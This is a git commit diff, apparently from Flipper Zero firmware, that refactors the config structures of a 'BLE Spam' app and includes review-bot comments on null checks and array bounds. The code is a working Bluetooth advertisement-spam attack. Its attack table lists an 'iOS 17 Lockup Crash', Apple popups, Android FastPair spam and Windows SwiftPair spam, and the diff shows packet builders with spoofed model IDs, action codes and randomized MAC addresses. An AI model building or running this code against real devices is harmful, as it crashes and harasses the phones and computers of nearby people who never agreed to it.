BLE Spam refactor config structures --nobuild

Willy-JL
2023-10-16 13:55:33 +01:00
parent c3536f7ecd
commit 42ee5f252c
9 changed files with 71 additions and 70 deletions


@@ -11,37 +11,32 @@
// Research on behaviors and parameters by @Willy-JL, @ECTO-1A and @Spooks4576
// Controversy explained at https://willyjl.dev/blog/the-controversy-behind-apple-ble-spam
typedef struct {
bool random_mac;
const BleSpamProtocol* protocol;
BleSpamMsg msg;
} Payload;
typedef struct {
const char* title;
const char* text;
Payload payload;
const BleSpamProtocol* protocol;
BleSpamPayload payload;
} Attack;
static Attack attacks[] = {
{
.title = "+ Kitchen Sink",
.text = "Flood all attacks at once",
.protocol = NULL,
.payload =
{
.random_mac = true,
.protocol = NULL,
.msg = {},
.cfg = {},
},
},
{
.title = "iOS 17 Lockup Crash",
.text = "Newer iPhones, long range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -54,11 +49,11 @@ static Attack attacks[] = {
{
.title = "Apple Action Modal",
.text = "Lock cooldown, long range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -71,11 +66,11 @@ static Attack attacks[] = {
{
.title = "Apple Device Popup",
.text = "No cooldown, close range",
.protocol = &ble_spam_protocol_continuity,
.payload =
{
.random_mac = false,
.protocol = &ble_spam_protocol_continuity,
.msg =
.cfg =
{
.continuity =
{
@@ -88,11 +83,11 @@ static Attack attacks[] = {
{
.title = "Android Device Pair",
.text = "Reboot cooldown, long range",
.protocol = &ble_spam_protocol_fastpair,
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_fastpair,
.msg =
.cfg =
{
.fastpair = {},
},
@@ -101,11 +96,11 @@ static Attack attacks[] = {
{
.title = "Windows Device Found",
.text = "Requires enabling SwiftPair",
.protocol = &ble_spam_protocol_swiftpair,
.payload =
{
.random_mac = true,
.protocol = &ble_spam_protocol_swiftpair,
.msg =
.cfg =
{
.swiftpair = {},
},
@@ -131,12 +126,13 @@ static int32_t adv_thread(void* ctx) {
uint16_t delay;
uint8_t* packet;
uint8_t mac[GAP_MAC_ADDR_SIZE];
Payload* payload = &attacks[state->index].payload;
BleSpamPayload* payload = &attacks[state->index].payload;
const BleSpamProtocol* protocol = attacks[state->index].protocol;
if(!payload->random_mac) furi_hal_random_fill_buf(mac, sizeof(mac));
while(state->advertising) {
if(payload->protocol) {
payload->protocol->make_packet(&size, &packet, &payload->msg);
if(protocol) {
protocol->make_packet(&size, &packet, &payload->cfg);
} else {
ble_spam_protocols[rand() % ble_spam_protocols_count]->make_packet(
&size, &packet, NULL);
@@ -200,8 +196,8 @@ static void draw_callback(Canvas* canvas, void* ctx) {
const Attack* attack =
(state->index >= 0 && state->index <= ATTACK_COUNT - 1) ? &attacks[state->index] : NULL;
const Payload* payload = &attack->payload;
const BleSpamProtocol* protocol = (attack && payload->protocol) ? payload->protocol : NULL;
const BleSpamPayload* payload = &attack->payload;
const BleSpamProtocol* protocol = attack->protocol;
canvas_set_font(canvas, FontSecondary);
canvas_draw_icon(canvas, 4, 3, protocol ? protocol->icon : &I_ble);
@@ -290,7 +286,7 @@ static void draw_callback(Canvas* canvas, void* ctx) {
"%02i/%02i: %s",
state->index + 1,
ATTACK_COUNT,
protocol ? protocol->get_name(&payload->msg) : "Everything");
protocol ? protocol->get_name(&payload->cfg) : "Everything");
canvas_draw_str(canvas, 4 - (state->index < 19 ? 1 : 0), 21, str);
canvas_set_font(canvas, FontPrimary);
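Review bot: In the `draw_callback` hunk, `const BleSpamProtocol* protocol = attack->protocol;` dereferences `attack` unconditionally, although the ternary just above sets `attack` to NULL when `state->index` is out of range; the line it appears to replace guarded this with `attack && ...`. The +/- markers are lost on this page, so which of the duplicated lines is the new side is inferred from the `Payload` to `BleSpamPayload` rename. Suggest `const BleSpamProtocol* protocol = attack ? attack->protocol : NULL;`, plus a one-line comment on the `attack` lookup stating which index values are expected to yield NULL. `draw_callback` starts and ends outside the hunk, so later uses of `attack` and `payload` cannot be checked from here.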


@@ -8,10 +8,10 @@
#include <furi_hal_random.h>
#include <core/core_defines.h>
typedef union BleSpamMsg BleSpamMsg;
typedef union BleSpamProtocolCfg BleSpamProtocolCfg;
typedef struct {
const Icon* icon;
const char* (*get_name)(const BleSpamMsg* _msg);
void (*make_packet)(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg);
const char* (*get_name)(const BleSpamProtocolCfg* _cfg);
void (*make_packet)(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg);
} BleSpamProtocol;
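Review bot: The `BleSpamProtocol` callbacks carry no contract comment, and renaming `out_size`/`out_packet` to `_size`/`_packet` removes the only hint that these are output parameters. Judging by the other files in this commit, `make_packet` tolerates a NULL `_cfg` (`adv_thread` passes NULL and the implementations test for it), while the `get_name` implementations dereference `_cfg` without a check. Suggest a comment above the struct along the lines of `// make_packet: writes *_size and *_packet; _cfg may be NULL. get_name: _cfg must not be NULL.` It should also state who releases `*_packet`, which is not visible in these hunks.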


@@ -4,12 +4,17 @@
#include "fastpair.h"
#include "swiftpair.h"
union BleSpamMsg {
ContinuityMsg continuity;
FastpairMsg fastpair;
SwiftpairMsg swiftpair;
union BleSpamProtocolCfg {
ContinuityCfg continuity;
FastpairCfg fastpair;
SwiftpairCfg swiftpair;
};
extern const BleSpamProtocol* ble_spam_protocols[];
extern const size_t ble_spam_protocols_count;
typedef struct {
bool random_mac;
BleSpamProtocolCfg cfg;
} BleSpamPayload;


@@ -16,9 +16,9 @@ static const char* type_names[ContinuityTypeCount] = {
[ContinuityTypeNearbyInfo] = "Nearby Info",
[ContinuityTypeCustomCrash] = "Custom Packet",
};
const char* continuity_get_name(const BleSpamMsg* _msg) {
const ContinuityMsg* msg = &_msg->continuity;
return type_names[msg->type];
const char* continuity_get_name(const BleSpamProtocolCfg* _cfg) {
const ContinuityCfg* cfg = &_cfg->continuity;
return type_names[cfg->type];
}
#define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size
@@ -33,12 +33,12 @@ static uint8_t packet_sizes[ContinuityTypeCount] = {
[ContinuityTypeCustomCrash] = HEADER_LEN + 11,
};
void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const ContinuityMsg* msg = _msg ? &_msg->continuity : NULL;
void continuity_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const ContinuityCfg* cfg = _cfg ? &_cfg->continuity : NULL;
ContinuityType type;
if(msg) {
type = msg->type;
if(cfg) {
type = cfg->type;
} else {
const ContinuityType types[] = {
ContinuityTypeProximityPair,
@@ -85,8 +85,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
case ContinuityTypeProximityPair: {
uint16_t model;
if(msg && msg->data.proximity_pair.model != 0x0000) {
model = msg->data.proximity_pair.model;
if(cfg && cfg->data.proximity_pair.model != 0x0000) {
model = cfg->data.proximity_pair.model;
} else {
const uint16_t models[] = {
0x0E20, // AirPods Pro
@@ -113,8 +113,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
}
uint8_t prefix;
if(msg && msg->data.proximity_pair.prefix == 0x00) {
prefix = msg->data.proximity_pair.prefix;
if(cfg && cfg->data.proximity_pair.prefix == 0x00) {
prefix = cfg->data.proximity_pair.prefix;
} else {
if(model == 0x0055 || model == 0x0030)
prefix = 0x05;
@@ -176,8 +176,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
case ContinuityTypeNearbyAction: {
uint8_t action;
if(msg && msg->data.nearby_action.type != 0x00) {
action = msg->data.nearby_action.type;
if(cfg && cfg->data.nearby_action.type != 0x00) {
action = cfg->data.nearby_action.type;
} else {
const uint8_t actions[] = {
0x13, // AppleTV AutoFill
@@ -197,8 +197,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
}
uint8_t flag;
if(msg && msg->data.nearby_action.flags != 0x00) {
flag = msg->data.nearby_action.flags;
if(cfg && cfg->data.nearby_action.flags != 0x00) {
flag = cfg->data.nearby_action.flags;
} else {
flag = 0xC0;
if(action == 0x20 && rand() % 2) flag--; // More spam for 'Join This AppleTV?'
@@ -265,8 +265,8 @@ void continuity_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSp
break;
}
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_continuity = {
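Review bot: `continuity_get_name` returns `type_names[cfg->type]` without checking the index against `ContinuityTypeCount` or checking the entry for NULL, and `draw_callback` passes the result straight to a `%s` format. An out-of-range `type` would read past the array, and a `ContinuityType` left out of the designated initializer would yield a NULL string. This is harmless while every config comes from the static `attacks[]` table, but the table is the only thing enforcing it. Suggest a guard before the return, for example `if(cfg->type >= ContinuityTypeCount || !type_names[cfg->type]) return "Unknown";`. `continuity_make_packet` runs well beyond these hunks, so whether `packet_sizes` is indexed with the same unchecked value cannot be confirmed here.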


@@ -31,6 +31,6 @@ typedef struct {
uint8_t type;
} nearby_action;
} data;
} ContinuityMsg;
} ContinuityCfg;
extern const BleSpamProtocol ble_spam_protocol_continuity;


@@ -4,18 +4,18 @@
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://developers.google.com/nearby/fast-pair/specifications/introduction
const char* fastpair_get_name(const BleSpamMsg* _msg) {
const FastpairMsg* msg = &_msg->fastpair;
UNUSED(msg);
const char* fastpair_get_name(const BleSpamProtocolCfg* _cfg) {
const FastpairCfg* cfg = &_cfg->fastpair;
UNUSED(cfg);
return "FastPair";
}
void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const FastpairMsg* msg = _msg ? &_msg->fastpair : NULL;
void fastpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const FastpairCfg* cfg = _cfg ? &_cfg->fastpair : NULL;
uint32_t model_id;
if(msg && msg->model_id != 0x000000) {
model_id = msg->model_id;
if(cfg && cfg->model_id != 0x000000) {
model_id = cfg->model_id;
} else {
const uint32_t models[] = {
// Genuine devices
@@ -57,8 +57,8 @@ void fastpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpam
packet[i++] = 0x0A; // AD Type (Tx Power Level)
packet[i++] = (rand() % 120) - 100; // -100 to +20 dBm
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_fastpair = {


@@ -6,6 +6,6 @@
typedef struct {
uint32_t model_id;
} FastpairMsg;
} FastpairCfg;
extern const BleSpamProtocol ble_spam_protocol_fastpair;


@@ -4,18 +4,18 @@
// Hacked together by @Willy-JL and @Spooks4576
// Documentation at https://learn.microsoft.com/en-us/windows-hardware/design/component-guidelines/bluetooth-swift-pair
const char* swiftpair_get_name(const BleSpamMsg* _msg) {
const SwiftpairMsg* msg = &_msg->swiftpair;
UNUSED(msg);
const char* swiftpair_get_name(const BleSpamProtocolCfg* _cfg) {
const SwiftpairCfg* cfg = &_cfg->swiftpair;
UNUSED(cfg);
return "SwiftPair";
}
void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpamMsg* _msg) {
const SwiftpairMsg* msg = _msg ? &_msg->swiftpair : NULL;
void swiftpair_make_packet(uint8_t* _size, uint8_t** _packet, const BleSpamProtocolCfg* _cfg) {
const SwiftpairCfg* cfg = _cfg ? &_cfg->swiftpair : NULL;
const char* display_name;
if(msg && msg->display_name[0] != '\0') {
display_name = msg->display_name;
if(cfg && cfg->display_name[0] != '\0') {
display_name = cfg->display_name;
} else {
const char* names[] = {
"Assquach💦",
@@ -43,8 +43,8 @@ void swiftpair_make_packet(uint8_t* out_size, uint8_t** out_packet, const BleSpa
memcpy(&packet[i], display_name, display_name_len); // Display Name
i += display_name_len;
*out_size = size;
*out_packet = packet;
*_size = size;
*_packet = packet;
}
const BleSpamProtocol ble_spam_protocol_swiftpair = {


@@ -6,6 +6,6 @@
typedef struct {
char display_name[25];
} SwiftpairMsg;
} SwiftpairCfg;
extern const BleSpamProtocol ble_spam_protocol_swiftpair;